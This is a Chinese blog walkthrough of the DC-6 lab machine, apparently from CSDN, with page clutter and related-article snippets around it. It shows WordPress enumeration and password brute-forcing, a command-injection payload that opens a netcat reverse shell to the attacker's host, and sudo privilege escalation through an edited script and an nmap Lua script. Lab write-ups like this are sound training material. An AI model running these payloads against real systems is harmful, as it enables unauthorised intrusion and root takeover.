dc6靶机攻略

最新推荐文章于 2024-08-19 16:34:36 发布
最新推荐文章于 2024-08-19 16:34:36 发布
阅读量38 收藏
点赞数
分类专栏: 靶机系列 文章标签: 网络安全 安全 web安全 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58683895/article/details/133999151
版权

dc6

扫描

image-20231023114206524

dirsearch -u http://10.4.7.149

image-20231023114226115

whatweb http://10.4.7.149

image-20231023115249077

扫描结果显示需要修改hosts才能访问主页

image-20231023114514522

随后可以使用http://wordy可以访问

image-20231023114654038

渗透

由于发现是wordpress搭建的,因此使用和dc2相同的操作试试看

wpscan --url http://dc-2 --enumerate u

使用wpscan获取用户名

image-20231023174318152

写入文件当做字典

随后使用cewl生成密码字典

cewl -w pojie1.txt http://wordy

wpscan爆破一下密码

wpscan --url http://wordy -U pojie_user.txt -P pojie1.txt

爆破不成功

image-20231023174758799

官网作者提示使用rockyou字典,而且还有筛选

得到用户信息

mark:helpdesk01

该用户即可登录wp

image-20231023201434063

在activity monitor tools发现疑似可以执行代码的框

image-20231023202736438f12看一下这个框,发现限制长度,把长度值直接改了,然后输入

127.0.0.1;nc -e /bin/bash 10.4.7.138 12138

反弹成功

image-20231023203113704

使用命令回显

python -c 'import pty;pty.spawn("/bin/bash")'

在/home/mark中发现该文件

image-20231023203738177

得到用户信息

graham:GSo7isUM1D4

提权

ssh可连接该用户

image-20231023203901948

使用sudo -l可以发现jens可以无密码执行backup.sh

追加写入该文件一条,执行时获取jens的shell

echo "/bin/bash" >> backups.sh

随后进入jens目录下执行文件

sudo -u jens /home/jens/backups.sh

image-20231023205545665

再次使用sudo -l

发现可以以root身份无密码执行nmap

image-20231023205632225

nmap的–script参数可以执行脚本

先写一个脚本文件,然后sudo执行

echo 'os.execute("/bin/bash")'>use.sh
sudo nmap --script=use.sh

这块貌似可能缺点啥…执行不顺畅,但是成功提权了

image-20231023210324244

image-20231023210408491

order libra
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC6靶场通关详细记录】
博客
12-19 1110
主机靶场DC6通关详细记录
DC-6通关教程
m0_74402888的博客
04-25 905
原理:nmap 可以执行脚本文件,可以创建一个文件并写入反弹 shell 的命令,默认用root 权限执行,所以反弹的 shell 也是 root。发现了jens用户的无密码命令执行文件backup.sh,也就是以jens的身份横向命令执行,接着我们来看一下该文件。根据在DC-6官网的提示,使用kali自带的巨大字典rockyou.txt中含有k01的密码作为爆破的字典。sudo -l 命令用于列出当前用户可通过 sudo(SuperUser DO)命令执行的所有命令的权限。
DC-6靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-01 1942
文章目录前言一、信息收集1,确定IP以及开放端口2,访问对方80端口3,登入对方后台二、反弹shell与提权1.得到SSH账号2.登陆对方SSH3,切换用户并提权 前言 DC-1靶机攻略 DC-2靶机攻略 DC-4靶机攻略 本篇将介绍DC-6的靶机攻略 一、信息收集 1,确定IP以及开放端口 2,访问对方80端口 这里和DC-2很像,直接输入IP无法访问80,需要配置etc/hosts文件 配置后成功进入目标网站,发现是由WordPress搭建。直接上WPscan WPScan是Kali Linu
DC-7靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-07 848
前言 其他DC靶机攻略请查看我的其他文章。 一、DC-7的信息收集 DC-7靶机开启后,可以直接看到IP地址,我们直接nmap扫描查看一下目标开放的端口: 扫描后我们可以查看到目标开放了80与22端口,并且网站的框架采用了Drupal8(后面会有用) 访问80端口,进入网站后需要登陆 在github上DC-7给出了一个用户名与密码 可是并不能登陆 <?php $servername = "localhost"; $username = "dc7user"; $password = .
DC-4靶机攻略
真正的大师,永远都怀着一颗学徒的心。
07-27 738
文章目录前言一、DC-4的信息收集1.确定IP,端口号;2 访问目标80端口,收集信息二、通过暴力破解密码,成功登陆1.确定密码字典,利用hydra进行爆破。三. 抓包改命令,为我所用1.分析界面2.BP抓包,修改命令3 进入用户家目录收集信息4.hydra爆破ssh账户密码。四.ssh登陆总结- - -思路 前言 在本章将介绍DC-4靶机攻略。 DC-1攻略:点击这里! DC-2攻略:点击这里! 提示:以下是本篇文章正文内容,下面案例可供参考 一、DC-4的信息收集 1.确定IP,端口号; 命令:n
DC-2靶机攻略
weixin_43179779的博客
10-16 1831
DC-2靶机攻略
DC-3靶机攻略
weixin_47311099的博客
07-16 446
DC-3攻略 信息收集 主机发现 nmap -sP 192.168.64.0/24 -oN nmap.sP 端口扫描 nmap -A 192.168.64.137 -p 1-65535 -oN NMAP_A 发现开放80端口 访问80 漏洞利用 安装joomla扫描工具joomscan apt-get install joomscan 查找cms版本漏洞 searchsploit Joomla 3.7.0 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-WEXzKK0O-
DC-1靶机攻略
记录日常学习
08-04 117
DC-1靶机提权通关,find / -exec "/bin/bash" -p \;
DC6靶机
qq_40646572的博客
05-06 282
信息搜集 nmap扫描局域网段,扫描到DC6靶机所在的ip地址以及0-1000端口中开放的端口。 进一步扫描dc6靶机开放的端口信息。发现DC6靶机仅开放了22以及80端口。 web信息搜集 了解到DC6靶机80端口处于开放状态,浏览器打开DC6靶机web服务。需要配置dns解析。 配置下hosts文件中的域名解析即可正常访问。 使用whatweb工具进行cms识别,发现web服务是wordpress框架。 与此同时,使用nmap漏洞脚本进行扫描。发现存在用户名泄露。将用户名保存下来。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8396
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
GPS叉车安全管理系统,远程监控管理车辆,保障叉车资产安全
jiuxindianzi的博客
08-16 436
九盾叉车监管系统利用GPS技术实现叉车全面监管,含IC卡指纹认证、无线实时测速、安全带报警器及小程序后台管理,提升安全性、效率及管理水平,降低运营成本。
AI安全-文生图
深度安全实验室
08-15 261
AI安全-文生图
等保测评中的安全需求分析:构建精准的信息安全防护体系
w13359990065的博客
08-15 691
在实施数字化转型的过程中,企业应将安全需求分析视为持续优化安全防护体系的关键环节,通过跨部门合作、员工培训、技术应用等策略,不断调整和优化安全需求,为业务的持续健康发展提供坚实的安全保障。某金融机构通过等保测评的指导,实施了详细的安全需求分析,识别了其关键业务功能和信息资产,包括客户数据、交易系统等,基于风险评估的结果,制定了针对性的安全控制措施,如多因素认证、数据加密、网络隔离等,有效提升了信息安全防护水平。实施安全需求分析的过程中,企业可能面临一些挑战,如技术更新快、业务需求变化频繁、安全资源有限等。
[图解]片段16 ESS状态机图-SysMLEA建模住宅安全系统
rolt的专栏
08-19 661
好,我们看,首先,电源管理这里,有两个状态
新160个crackme - 030-Acid Bytes.4
qq_41483767的博客
08-14 288
Delphi程序分析,upx脱壳,ida静态分析、动态调试,简单算法
CSP-CCF 202012-1 期末预测之安全指数
2301_79705447的博客
08-16 293
刚开始看到题目被没见过的ReLU吓到了,以为会很难,认真读懂题目后,感觉应该是我这些天做过的算最简单的了。所以说:不要被没见过的新鲜事物吓到,要迎难而上!
四路一体行车记录仪,语音提示注意行人,保障车辆行驶安全
jiuxindianzi的博客
08-15 287
九盾安防推出四路一体行车记录仪,全方位记录叉车工作场景,实时记录行驶信息,提供高清影像,减少伤亡事故,提升安全性和效率,解决事故责任划分难题,助力企业管理。
华为账号“一键登录”能力让美团用户尽享安全便捷的登录体验
最新发布
HarmonyOS SDK闭源开放能力技术团队
08-19 362
3.将获取到的匿名手机号设置给下面PreviewLoginButtonPage示例代码中的quickLoginAnonymousPhone变量,调用LoginWithHuaweiIDButton组件,实现应用自己的登录页面,并展示华为账号一键登录按钮和华为账号用户认证协议(Account Kit提供跳转链接,应用需实现协议跳转,参见约束与限制第2点),用户同意协议并点击一键登录按钮后,可获取到Authorization Code,将该值传给应用服务器用于获取用户信息(完整手机号、UnionID)。
Linux 主机一键安全整改策略
weixin_45840241的博客
08-15 622
echo "---------ssh登录前警告banner设置----------"echo "---------禁止root用户远程登录----------"echo "---------设置用户密码过期时间----------"echo "---------设置密码复杂度限制----------"echo "---------配置pacct工具----------"echo "---------禁用不必要的别名----------"安装配置记录用户对设备的操作的pacct工具;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值